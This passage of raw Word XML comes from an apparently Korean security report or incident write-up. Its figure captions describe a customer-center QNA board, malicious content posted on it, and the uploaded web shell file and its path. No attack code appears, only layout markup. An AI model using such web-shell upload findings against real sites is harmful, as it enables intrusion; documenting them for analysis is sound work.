AAAAhAPyjyXi4&#10;AgAAowUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAFms&#10;0RPgAAAACwEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F755FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251907072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AC70A7C" wp14:editId="3AFD93D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4465955</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>774758</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429260" cy="172720"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474585" name="직사각형 1951474585"/>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22173" id="직사각형 1951474585" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:351.65pt;margin-top:61pt;width:33.8pt;height:1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jUuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mGnY8ROTASuCgQ&#10;JEGTImuaIi0BFIclacvuLr1Dgd6gmy56riK9Q4fUJ0YadFFUC4rkzLzhvPmcnm1rRTbCugp0TrOD&#10;lBKhORSVXuX0w93izTElzjNdMAVa5HQnHD2bvX512pipGEEJqhCWIIh208bktPTeTJPE8VLUzB2A&#10;ERqFEmzNPB7tKiksaxC9VskoTQ+TBmxhLHDhHN5etEI6i/hSCu6vpXTCE5VTfJuPq43rMqzJ7JRN&#10;V5aZsuLdM9g/vKJmlUanA9QF84ysbfUHVF1xCw6kP+BQJyBlxUWMAaPJ0mfR3JbMiBgLkuPMQJP7&#10;f7D8anNjSVVg7k4m2fhoPDmeUKJZjbl6/Pbw+Pn7zx8Pv75+IXti5Kwxboqmt+bGdieH20DAVto6&#10;/DE0so087waexdYTjpfj0cnoELPBUZQdjY5GMQ/Jk7Gxzr8VUJOwyanFNEZ22ebSeXSIqr1K8KVh&#10;USkVU6k0aUIs6SSNFg5UVQRp0HN2tTxXlmwYVsNikeIXCgDR9tTwpDRehhDboOLO75QIGEq/FxIJ&#10;wzBGrYdQqmKAZZwL7bNWVLJCtN4m+856i+g6AgZkia8csDuAXrMF6bHbN3f6wVTESh+Mu9D/ZjxY&#10;RM+g/WBcVxrsS5EpjKrz3Or3JLXUBJaWUOywnCy0feYMX1SYwUvm/A2z2FiYdBwW/hoXqQAzBd2O&#10;khLsp5fugz7WO0opabBRc+o+rpkVlKh3GjvhJBuPQ2fHw3gSionYfclyX6LX9Tlg9jMcS4bHbdD3&#10;qt9KC/U9zpR58Ioipjn6zin3tj+c+3aA4FTiYj6PatjNhvlLfWt4AA+shgq9294za7oy9lj/V9A3&#10;NZs+q+ZWN1hqmK89yCqW+hOvHd84CWLhdFMrjJr9c9R6mq2z3wAAAP//AwBQSwMEFAAGAAgAAAAh&#10;AKsmrwPfAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyojYtwG+JUgIQQ&#10;qAcocHfjbRLVP1HsJuHtWU5w3JlPszPlZvaOjTikLgYN1wsBDEMdbRcaDZ8fT1crYCmbYI2LATV8&#10;Y4JNdX5WmsLGKbzjuMsNo5CQCqOhzbkvOE91i96kRewxkHeIgzeZzqHhdjAThXvHpRC33Jsu0IfW&#10;9PjYYn3cnbyGt3g8cPcl5at6eJbqxa+mZtxqfXkx398ByzjnPxh+61N1qKjTPp6CTcxpUGK5JJQM&#10;KWkUEUqJNbA9KTdrCbwq+f8N1Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdTR41LgC&#10;AACjBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAqyav&#10;A98AAAALAQAADwAAAAAAAAAAAAAAAAASBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F755FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251912192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24770D51" wp14:editId="2D1D2FF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4667424</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1003993</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="82550" cy="1390650"/>
                <wp:effectExtent l="0" t="0" r="69850" b="57150"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474587" name="직선 화살표 연결선 1951474587"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="82550"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17B56A" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="직선 화살표 연결선 1951474587" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:367.5pt;margin-top:79.05pt;width:6.5pt;height:10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EDIQIAAFYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNEnZ7narpnvoUi4I&#10;Kn4ewHXsxJL/ZJumPYJ4ASQkhMSBG9cV4qlQ9x0YO2l2F8QBRA5Oxp7vm5lvxplf7JREW+a8MLrE&#10;xSjHiGlqKqHrEr96uXowxcgHoisijWYl3jOPLxb3781bO2Nj0xhZMYeARPtZa0vchGBnWeZpwxTx&#10;I2OZhkNunCIBTFdnlSMtsCuZjfP8NGuNq6wzlHkPu5fdIV4kfs4ZDc849ywgWWLILaTVpXUT12wx&#10;J7PaEdsI2qdB/iELRYSGoAPVJQkEvXbiNyolqDPe8DCiRmWGc0FZqgGqKfJfqnnREMtSLSCOt4NM&#10;/v/R0qfbtUOigt6dT4qTs5PJ9AwjTRT06vD1zeHdF3T96cPh7ffr95/R4ePVj29Xce+WMyjYWj8D&#10;oqVeu97ydu2iHDvuVHxDoWiXVN8PqrNdQBQ2p+PJBFpD4aR4eJ6fggEs2Q3YOh8eM6NQ/CixD46I&#10;uglLozX017giKU+2T3zogEdAjCw1amNxOdBG2xspqpWQMhmu3iylQ1sC47Fa5fD0se+4BSLkI12h&#10;sLcgS3CC6Fqy3lNqSDYq0NWcvsJesi74c8ZBXaiySzLNNRtCEkqZDsXABN4RxiG9AdinHS/En4C9&#10;f4SyNPN/Ax4QKbLRYQAroY3rRLsbPeyOKfPO/6hAV3eUYGOqfZqGJA0Mb+pof9Hi7bhtJ/jN72Dx&#10;EwAA//8DAFBLAwQUAAYACAAAACEAJZhT3eAAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7D&#10;MBBE70j8g7VI3KiTlpIoxKlQBIgDlxSE2psbL4lFvI5itw1/z3KC486MZt+Um9kN4oRTsJ4UpIsE&#10;BFLrjaVOwfvb000OIkRNRg+eUME3BthUlxelLow/U4OnbewEl1AotII+xrGQMrQ9Oh0WfkRi79NP&#10;Tkc+p06aSZ+53A1ymSR30mlL/KHXI9Y9tl/bo1Ow/JD73Yts7Ni0Ndb21U2P5lmp66v54R5ExDn+&#10;heEXn9GhYqaDP5IJYlCQrda8JbKxzlMQnMhuc1YOClZZloKsSvl/Q/UDAAD//wMAUEsBAi0AFAAG&#10;AAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQ&#10;SwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQ&#10;SwECLQAUAAYACAAAACEAGZbhAyECAABWBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAUAAYACAAAACEAJZhT3eAAAAALAQAADwAAAAAAAAAAAAAAAAB7BAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA8wAAAIgFAAAAAA==&#10;" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00267727">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12DB80DD" wp14:editId="53C5EB8C">
            <wp:extent cx="4572000" cy="3938257"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="1951474584" name="그림 195147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1E3704" w14:textId="5E56AB5E" w:rsidR="00267727" w:rsidRPr="00232CBC" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="_Toc209094594"/>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21</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. “</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>고객센터</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 내 </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NA”</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>
    </w:p>
    <w:p w14:paraId="79A8F244" w14:textId="77777777" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B0DE08" w14:textId="661DE812" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00456990">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="088072B1" wp14:editId="6AEA4B60">
            <wp:extent cx="4572000" cy="1477049"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
            <wp:docPr id="1951474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6775" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId36"/>
                    <a:srcRect l="22318" t="56564" r="23279" b="10351"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1477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5CE3F7" w14:textId="48B1BDA6" w:rsidR="00267727" w:rsidRPr="00232CBC" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc209094595"/>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22</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>게시판에 작성된 악성 콘텐츠 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p w14:paraId="6F08AD91" w14:textId="77777777" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01482B59" w14:textId="679C1F31" w:rsidR="00267727" w:rsidRDefault="003240A2" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251901952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="013EC44C" wp14:editId="395A82D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1092200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1163147</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1260764" cy="214745"/>
                <wp:effectExtent l="0" t="0" r="15875" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474581" name="직사각형 1951474581"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1260764" cy="214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0ABCB" id="직사각형 1951474581" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:86pt;margin-top:91.6pt;width:99.25pt;height:16.9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f8tgIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mGnY8QOTASuCgQ&#10;JEGTImuaoiwBFIcl6V936R0K9AbddNFzFekdOiQlxUiDLop6QZOamTczbz6nZ9tWkrUwtgFV0Owg&#10;pUQoDmWjlgX9cDd/c0yJdUyVTIISBd0JS8+mr1+dbnQuRlCDLIUhCKJsvtEFrZ3TeZJYXouW2QPQ&#10;QqGwAtMyh0+zTErDNojeymSUpofJBkypDXBhLX69iEI6DfhVJbi7riorHJEFxdhcOE04F/5Mpqcs&#10;Xxqm64Z3YbB/iKJljUKnA9QFc4ysTPMHVNtwAxYqd8ChTaCqGi5CDphNlj7L5rZmWoRckByrB5rs&#10;/4PlV+sbQ5oSa3cyycZH48lxRoliLdbq8dvD4+fvP388/Pr6heyJkbONtjma3uob070sXj0B28q0&#10;/h9TI9vA827gWWwd4fgxGx2mR4djSjjKRsGrL0TyZK2NdW8FtMRfCmqwjoFetr60Lqr2Kt6Zgnkj&#10;JX5nuVRk45NJJ2mwsCCb0ku90Jrl4lwasmbYDvN5ir/O8Z4ahiEVRuNzjFmFm9tJER28FxUyhnmM&#10;ogffq2KAZZwL5bIoqlkporfJvrPeIuQsFQJ65AqjHLA7gF4zgvTYkYFO35uK0OqDcZf634wHi+AZ&#10;lBuM20aBeSkziVl1nqN+T1KkxrO0gHKH/WQgDprVfN5gBS+ZdTfM4GThDOK2cNd4VBKwUtDdKKnB&#10;fHrpu9fHhkcpJRuc1ILajytmBCXyncJROMnGYz/a4TGeHI3wYfYli32JWrXngNXHLsfowtXrO9lf&#10;KwPtPS6VmfeKIqY4+i4od6Z/nLu4QXAtcTGbBTUcZ83cpbrV3IN7Vn2H3m3vmdFdGzscgCvop5rl&#10;z7o56npLBbOVg6oJrf7Ea8c3roLQON3a8rtm/x20npbr9DcAAAD//wMAUEsDBBQABgAIAAAAIQDo&#10;pIv13wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjcqF1X4CjEqQAJIRAH&#10;KHB3420S1T9R7Cbh7VlOcNvRjma+qbaLd2zCMfUxaFivBDAMTbR9aDV8fjxeFcBSNsEaFwNq+MYE&#10;2/r8rDKljXN4x2mXW0YhIZVGQ5fzUHKemg69Sas4YKDfIY7eZJJjy+1oZgr3jkshbrg3faCGzgz4&#10;0GFz3J28hrd4PHD3JeWLun+S6tkXczu9an15sdzdAsu45D8z/OITOtTEtI+nYBNzpJWkLZmOYiOB&#10;kWOjxDWwvQa5VgJ4XfH/G+ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADy7t/y2AgAA&#10;pAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAOiki/Xf&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAAEAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAc&#10;BgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00267727">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251896832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14DA595E" wp14:editId="605A0104">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3928110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>430299</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1585941" cy="187036"/>
                <wp:effectExtent l="0" t="0" r="14605" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474580" name="직사각형 1951474580"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1585941"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514D6" id="직사각형 1951474580" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:309.3pt;margin-top:33.9pt;width:124.9pt;height:14.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muAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMmyabdRs9Wq1SKk&#10;qq1oUc9ex95Ecmxje/+4lXeoxBtw4cBzofIOjO0kXZWKA2IPXjsz883MNz8np9tWoDUztlGyxNlB&#10;ihGTVFWNXJb44+38zQQj64isiFCSlXjHLD6dvn51stEFG6laiYoZBCDSFhtd4to5XSSJpTVriT1Q&#10;mkkQcmVa4uBplkllyAbQW5GM0vQw2ShTaaMosxa+nkchngZ8zhl1V5xb5pAoMcTmwmnCufBnMj0h&#10;xdIQXTe0C4P8QxQtaSQ4HaDOiSNoZZo/oNqGGmUVdwdUtYnivKEs5ADZZOmzbG5qolnIBcixeqDJ&#10;/j9Yerm+NqipoHbHeTY+GucToEmSFmr1+O3+8cv3nz/uf319QHti4GyjbQGmN/radC8LV0/AlpvW&#10;/0NqaBt43g08s61DFD5m+SQ/HmcYUZBlk6P07aEvRPJkrY1175hqkb+U2EAdA71kfWFdVO1VvDOp&#10;5o0Q8J0UQqKNTybN02BhlWgqL/VCa5aLM2HQmkA7zOcp/DrHe2oQhpAQjc8xZhVubidYdPCBcWAM&#10;8hhFD75X2QBLKGXSZVFUk4pFb/m+s94i5CwkAHpkDlEO2B1ArxlBeuzIQKfvTVlo9cG4S/1vxoNF&#10;8KykG4zbRirzUmYCsuo8R/2epEiNZ2mhqh30k1Fx0Kym8wYqeEGsuyYGJguaC7aFu4KDCwWVUt0N&#10;o1qZzy999/rQ8CDFaAOTWmL7aUUMw0i8lzAKx9l47Ec7PMb50QgeZl+y2JfIVXumoPrQfRBduHp9&#10;J/orN6q9g6Uy815BRCQF3yWmzvSPMxc3CKwlymazoAbjrIm7kDeaenDPqu/Q2+0dMbprYwcDcKn6&#10;qSbFs26Out5SqtnKKd6EVn/iteMbVkFonG5t+V2z/w5aT8t1+hsAAP//AwBQSwMEFAAGAAgAAAAh&#10;AOnSc5LeAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sXUFtKE0nQEII&#10;tAMMuGeN11ZrnKrJ2vL2mBPcbPnT7+8vN4vrxYRj6DxpWK8SEEi1tx01Gj4/nq4UiBANWdN7Qg3f&#10;GGBTnZ+VprB+pnecdrERHEKhMBraGIdCylC36ExY+QGJbwc/OhN5HRtpRzNzuOtlmiSZdKYj/tCa&#10;AR9brI+7k9Pw5o8H2X+l6Wv+8JzmL07NzbTV+vJiub8DEXGJfzD86rM6VOy09yeyQfQasrXKGOUh&#10;5woMqEzdgNhruM2vQVal/N+g+gEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBd/cLmuAIA&#10;AKQFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDp0nOS&#10;3gAAAAkBAAAPAAAAAAAAAAAAAAAAABIFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00267727" w:rsidRPr="00456990">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15798942" wp14:editId="77E5D5E9">
            <wp:extent cx="4572000" cy="1473081"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="19514745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7120" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId37"/>
                    <a:srcRect l="22470" t="40585" r="22975" b="26326"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="14730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DCE962" w14:textId="0BD96C6F" w:rsidR="00267727" w:rsidRPr="00232CBC" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="_Toc209094596"/>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23</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>업로드된 웹쉘 파일</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>및 경로</w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>
    </w:p>
    <w:p w14:paraId="24A7B8D5" w14:textId="77777777" w:rsidR="0008234B" w:rsidRDefault="0008234B" w:rsidP="0008234B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB194F7" w14:textId="30A8E92B" w:rsidR="00267727" w:rsidRDefault="0008234B" w:rsidP="0008234B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00134635">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251626496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00A2D017" wp14:editId="474C3538">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2334259</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1860878" cy="948055"/>
                <wp:effectExtent l="38100" t="0" r="25400" b="61595"/>
                <wp:wrapNone/>
                <wp:docPr id="225001604" name="직선 화살표 연결선 225001604"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
